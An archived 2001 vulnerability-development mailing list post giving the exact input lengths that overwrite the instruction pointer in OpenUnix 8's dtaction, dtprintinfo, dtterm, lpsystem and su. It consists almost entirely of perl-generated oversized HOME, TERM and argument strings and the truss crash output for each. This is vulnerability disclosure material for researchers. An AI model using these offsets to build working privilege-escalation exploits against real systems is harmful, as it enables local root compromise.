Vulnerability Development mailing list archives
Fwd: Returned post -- OpenUnix 8 lpsystem , su and DT overflows lengths to eip
From: dotslash () snosoft com
Date: Fri, 26 Oct 2001 15:43:34 -0700
Sorry if this has already made it to this list... I have been getting lots of listserv replys it doesn't seem to like my mail client.
I have had several people ask for the exact lengths on the OpenUnix 8 DToverflows below is some debugging information to help out. (Davor sorry I sent this to a list... but for some reason I can't mail you) -KF # HOME=`perl -e 'print "A" x 1036'` # export HOME # truss dtaction a Segmentation Fault Incurred fault #6, FLTBOUNDS %pc = 0x41414141 siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 *** process killed *** # HOME=`perl -e 'print "A" x 1035'` # export HOME # turss dtaction a Segmentation Fault Incurred fault #6, FLTBOUNDS %pc = 0x00414141 siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141 *** process killed *** ------------------------------------------------------------------------------------------------- # HOME=`perl -e 'print "A" x 1036'` # export HOME # truss dtprintinfo Segmentation Fault Incurred fault #6, FLTBOUNDS %pc = 0x41414141 siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 *** process killed *** # HOME=`perl -e 'print "A" x 1035'` # export HOME # truss dtprintinfo Incurred fault #6, FLTBOUNDS %pc = 0x00414141 siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141 *** process killed *** ------------------------------------------------------------------------------------------------ # HOME=`perl -e 'print "A" x 1035'` # export HOME # truss dtterm Segmentation Fault Incurred fault #6, FLTBOUNDS %pc = 0x00414141 siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141 *** process killed *** # HOME=`perl -e 'print "A" x 1036'` # export HOME Incurred fault #6, FLTBOUNDS %pc = 0x41414141 siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 *** process killed *** ------------------------------------------------------------------------------------------------ # truss lpsystem `perl -e 'print "A" x 2190'` Incurred fault #6, FLTBOUNDS %pc = 0x08077B40 siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141 *** process killed *** # truss lpsystem `perl -e 'print "A" x 2192'` Incurred fault #6, FLTBOUNDS %pc = 0x08077B40 siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 *** process killed *** -------------------------------------------------------------------------------------------------- # TERM=`perl -e 'print "A" x 1632'` # export TERM # truss /bin/su - Incurred fault #6, FLTBOUNDS %pc = 0x00414141 siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141 *** process killed *** ------------------------------------------------------------------------------------------------- (no eip hit here # TERM=`perl -e 'print "A" x 1264'` # export TERM # /sbin/su - # exit # TERM=`perl -e 'print "A" x 1265'` # export TERM # /sbin/su - Segmentation Fault - core dumped
Current thread:
- Fwd: Returned post -- OpenUnix 8 lpsystem , su and DT overflows lengths to eip dotslash (Oct 27)